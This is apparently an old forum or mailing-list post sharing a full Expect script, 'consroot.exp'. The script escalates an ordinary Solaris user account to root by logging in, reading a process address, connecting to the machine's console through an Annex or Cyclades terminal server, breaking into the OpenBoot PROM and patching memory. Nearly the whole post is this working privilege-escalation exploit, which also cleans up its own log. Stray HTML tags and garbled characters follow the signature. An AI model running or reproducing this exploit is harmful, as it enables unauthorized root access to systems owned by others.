Hi there, here is a fully automated script for getting a root shell using a normal user account and (remote-)console acces. The Script was written by me based on an article from phrack.com (article #53 - hacking forth by mudge) ---snip--- # # ---> consroot.exp <--- # by mickeyX 16.6.2003 # # connects to a SUN and a Terminalserver and hacks the OBP to get a root shell. # You need: # - a "normal" user account on a SUN # - terminalserveraccess on the same SUN # # this was tested on: # - MacOS X version 10.2.6 using expect 5.38.0 # - Solaris 8 using expect 5.25.0 # - ANNEX terminalservers # - CYCLADES terminalservers # # This is just a prototype ! Use with care on other terminalservers ! # # set timeout 2 set MODE [lindex $argv 0] set TARGET [lindex $argv 1] set UID [lindex $argv 2] set PW [lindex $argv 3] set CTYPE [lindex $argv 4] set TSERVER [lindex $argv 5] set TPORT [lindex $argv 6] set TPW [lindex $argv 7] set LOG log.txt proc usage {} { puts "\nusage: expect consroot < TERMINALSERVER> " puts "\twhere MODE is one of:" puts "\t\tT = Target is using TELNET" puts "\t\tS = Target is using SSH" puts "\tTARGET = machine to hack" puts "\tUSER = unprivileged user on target host" puts "\tPW = password on target host" puts "\n\twhere CONSOLETYPE is one of:" puts "\t\tA = Target is connected to Annex Terminalserver" puts "\t\tC = Target is connected to Cyclades Terminalserver\n" puts "\tTERMINALSERVER = consoleaccess for target host" puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected" puts "\tTPW = password for terminalserverport\n" exit 1 } ### # MAIN ### if { $argc < 8 } usage # check for Terminalservertypes... switch -- $CTYPE \ A { } C { } default usage # check for connect-Mode... switch -- $MODE \ T { spawn telnet $TARGET set main_session $spawn_id expect "ogin:" send "$UID\n" expect "assword" send "$PW\n" } S { spawn ssh -l $UID $TARGET set main_session $spawn_id expect "assword" send "$PW\n" } default usage # start korn-shell... expect { exp_continue } send "exec /usr/bin/ksh\n" # set defined prompt - so we can scan for it... send "export PS1=PROMPT:\n" # activate logging for getting credentials Adress... log_file -noappend $LOG ### # get adress for OBP-hacking: ### send "/usr/bin/ps -o addr -p $$\n" expect "ADDR" expect "PROMPT:" set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"] puts "\nReceived ADRESS from shell was: $ADRESS\n" ### ### ### # reset logfile... exec sh "-c" "1>$LOG" ### # get OS-architecture for OBP-hacking: ### send "/usr/bin/isainfo -b\n" expect "*" # clear expect buffer expect "PROMPT:" set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"] puts "\nReceived Architecture was: $ARC\n" exec "rm" "-f" "$LOG" ### ### ### # connect to Terminalserver... puts "\nPlease wait while connecting to Terminalserver...\n" spawn telnet -e "#" $TSERVER $TPORT switch -- $CTYPE \ A { puts "\nstarting Annex connect ...\n" expect "Port password" send "$TPW\n" expect "Permission granted" } C { puts "\nstarting Cyclades connect ...\n" expect "Port*:" send "$TPW\n" expect "Password:" send "$TPW\n" expect "*" } # hack OBP... send "#\n" expect "telnet" send "send brk\n" expect "ok" # let's ROCK and ROLL !!! switch -- $ARC \ 64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n" } 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n" } expect "ok" send "go\r" # deactivate logging... log_file exec rm "-f" "$LOG" # give control to admin... set spawn_id $main_session send "\r" expect "PROMPT:" send "id\n" expect "PROMPT:" interact ---snip--- -- UNIX is like a wigwam: no windows, no gates, apache inside, stable. Windows is not the answer? it's the question. No is the answer.
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß